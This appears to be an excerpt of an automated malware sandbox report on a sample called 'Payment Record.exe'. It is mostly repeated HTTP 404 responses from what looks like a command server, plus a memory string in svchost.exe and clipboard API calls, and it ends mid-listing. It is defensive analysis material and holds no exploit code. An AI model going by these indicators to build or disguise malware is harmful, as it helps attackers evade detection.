Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6M9m7K6Gr1rYafzRd82XcweG8%2B4h9lRUZ7MfMGL0BNktQW0jMDuZHtam6YGntCfTzn%2FT9pqFJq4avaOQKMXrNNNuw1n1i5ECQk2g4Exhb9N%2FDt5pJVfRG1U3HB8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea0669bb141ba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gip8Fk%2Bmq6z2iLCYXejYbJcoc7f1BiMyX4uZwo1329AsjBYN1l6hMh3KMvmJhVFYf%2FfaNGNv0ktn4sZDCIYQ2uG0pXjnW7FwlvTMqgjLDTlQ0n5JK0B85y0quYA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea073cd6470a4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2133&min_rtt=2133&rtt_var=1066&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EfgNK4VFQSk756Q%2FER85j5ETluMp%2FAEA%2BemGBXI%2FsdFe2aZ3qkvkhYRqP4%2BIoToeElXAnwI4ieStSH6iqLGinisBxQnkoDg0FjvdRWvj84GTq7EQBTJ%2F3KeQKRE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea07fdd1a3f3b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1602&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZCKELN3KMi%2BsQ9fusTBRjFKlsWOOEP5locBoJIFq4suvRbi8fpfeWEr9sqAjj5GUw5wMdeR6t7UFF46p9DtsRglQt0WOMdHGPFvN52RKuVbOQhI5e2K%2BSJYF9pI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea08befca0fa8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1448&rtt_var=724&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hblQQHuSAjctcXG1%2BJIcZeDx8HduLQ0dL4Q8NmLftHq8Me6CaRdl%2BCaSI7PRcK8QdHtn%2FSwGuEOADhHrqpB%2Fq0mtEfrBWmyUkV7Ec1DHlhaZkgH7joN7EUDUP5A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea0981a8e0fa8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1467&rtt_var=733&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EeMNFNMqnhHthAFCfhedhi1%2FLlrsKpwj4SbKW0s5SBVZoRjZ5x7YOOyIANStOz74Dqor4oxPnSipo4eT4neHyeUOSC1Ej5esm1q8MnFSyHWSnbzai%2B9R6XlEqAY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea0a428a98ce0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1765&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3vsOnT6%2FZJB69%2F0kQ1uxl0qyveC%2BmqzlBi6Y3M56UcjN%2F2U%2By%2BoRWsccN%2FyHe9bZjqUZbVSFrj%2FOyeMZr%2BeCYmbh8DSIllL6E7rkFOjxVtJCmuurLSrr%2BSH%2BMY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea0bcfbcc3f3b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1642&rtt_var=821&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENh3R9kBcHLBxUeeywGx39VoS0XQGxT%2Bh12%2F7kWIlBy5GQ1tZHq5y2pKb4oKB%2F0SGHW6NrV2WutwcHKQ6gdKd80Qe08NxrVF870XcCYdB9rAw0qmOmoSXy6rGDU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea0c99e394388-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1616&rtt_var=808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2fGvFVzw27ndwkRqh8sX8Z0fZAeR8aVOnY77qo3TEXrjTPQX%2B6hS8QlzjUbaC24rMgrgTcTImXec0OMMXbQ%2F6OlxjI9k2kZfQh16fb5hGSFLR4cFAahX6HSVbvw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea0d5bde11899-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1546&rtt_var=773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1j6nzXSNfMmVkDogrEtNigBdph79CAFR%2FbolpzPhCy0gaBqyEFZUAMpm2g4sp5hCg3hW3W9sO02rV2ydIpNL65N29zm5R3jp1IG%2BmO8yBWkavzrYFw0dQKfWdXM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea0ee8f118ce0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oNy%2F4fR3ICBllZLlJm1bvwQ7cKMljv5HMxv6Js37bAQpyrmajA%2BYjZ6UNXycvFmNxUWXDImfe03tgIVd7aO9HarOeb%2FmSRPiqGaF%2BrMu78aec%2BqmA%2BeHcaPQOpk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea0fadd8370a4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2014&rtt_var=1007&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZpkTnR%2Fhd7HdzVeothlWX3AY5fSdiQZvAGe9LjmY5gxOTZm56BxJyfnAplx1f4EPBNLqXoOPFIux7HxJi0uLtqhYmds9rUBCGGV6WFz5Nar8ARccAVUa%2FvZiZlc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea106d93a41ba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zt0XSo7x3Y7Ox2aTroK64vLDLE%2FAkvCR3GLMg8Lyt84MlEn7NQQuIdk9mCPkk4RRMfCs4shkV0hIZK%2Fp6Mi%2FKDrkYb5pF5StqNhZ9Cv647VVnthRXZ8PyPwScgY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea11308d64388-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1577&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Obj6IyEHEdT%2FI3oULcLYmuAUxKftqHz1UzZ41c17jtyQtI8BLNmue7yf6MhTINiNbvlvxYxkpXpn4zRBFJJPE5cm9KdbJCrqzXCu18kQlupG%2F5m6d7YQOUYR5lo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea11fdf500fa8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1454&min_rtt=1454&rtt_var=727&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7r%2BTAjcrd8hSbsZ3nJG9imESFEfQLHkMhYxoNg2uBiHlfZT6I1ILyFe9W9HjedYRf516PgsRxZp7lYV54nVpYj9loM9t21VL4nYS2bZpGaHmwx6%2BklEXudN68U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea14f4d897293-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1986&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rc7bpncmhb0F54QtA4w0p8evLPitbheCySvGG0%2FtfZHw1%2By0JarIxSgm0uJzGrLj3zqtn5utIS5G5enIus1Er%2FitCBxGCx3X0JmHc1u629pzkuDMZjjBplxEsp4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea15b6ebf4388-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIKrvCGm32EOlRwXxNIIl5xV%2BRjcykudXuqOOZgc4xR%2FjIFsNFzRB1v1aDt7uZS%2Fb7P%2BqWi5w2PHItnW%2Fc4lz3P%2FiLsc5bOg0sUIhmq5oitOkOsnoLvXnfDL%2Fj8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea167c9fe70a4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2034&rtt_var=1017&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fqdl8N5vbttEs96vty7h70rqxF84A%2Fq9WppmyJRKX0gG8ojoDK4c%2FpV2yzdO%2B9jr7LKPByw%2FlJH4tndY49CbVWKmIgl9EUUQCC3YGKL8NhGpCC1Gy5HStnPMMtg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea17f1bbf8ce0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1769&rtt_var=884&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LMRg8a0nu%2FT5W0Pjdzr5p%2BjapjTigfKB5OoO2t5VZXY699tC3RUhLNlpXQqThawiaB0PyFrOuSzwTyfiKtonmo1hVvkZH2p5nERPNBERy3RKpkaA5ppU3Jk0g5Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea18b1f8670a4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2054&min_rtt=2054&rtt_var=1027&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHPjPkeA67WBkU9AGzcP%2FOP0maBKqdawiW2M2xZrfSuP2f9hf5%2FuLqz3d7W8U%2FYxXml43fjuhnFEWl%2BxPunbND6TXlkzRW%2BliUwHVx8Y1n0UgD2e9kte9seuFgw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea1aee8ca0fa8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1475&min_rtt=1475&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jXODPcYY%2BKMFSo6s6mccEIlj6DK6S%2FFQ2awag6EGKawy%2FB251ZMDZ8JSQVx%2BvxVj2UFMLZW0yl0HAyoLEmxtlsLcBXHpF3NGshLdMWK4SOHE%2B5MJXuxmFYz%2B0q4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea1d31e4270a4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2004&rtt_var=1002&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkYpFGGEFI33NA6cIqU9yMEUZM%2B%2FMvMUth1PpmXJBdQBinxyGXjZFCliETDTTXkNe2jESXNW5ovhMiyHeEepT5QBJJnc6M77ZnnGazybjcK34qPAAC%2FG89jW5mg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea1f87c9f8ce0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2B51d%2FAcm6xiZ0BGrN3pgjvuqq%2FCKE2J8dO6bPcA9kEHV0tm2ELY3DJfBvnMY%2FkuFdZVl3rw6BR54cnQcYcUS3myozF%2BTVjKpXjH6RDyInpVlOs7SVKQa2e40SA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea21069971899-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1717&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:05:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANX0trp1VOUng6lqD3zV8UuYQmPzC7R5rYzsopmJlYmit5YBD9kg2qiewjpuT9q9WHGUFBveDHviTQt5xsmEgzHghb%2B8zFI6FtQDOfcFsecuKQ6XcdetxalBrG4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea2285c020fa8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1484&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: svchost.exe, svchost.exe, 00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_00714164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00714164

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_00714164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00714164

Source: C:\Users\user\Desktop\Payment Record.exe

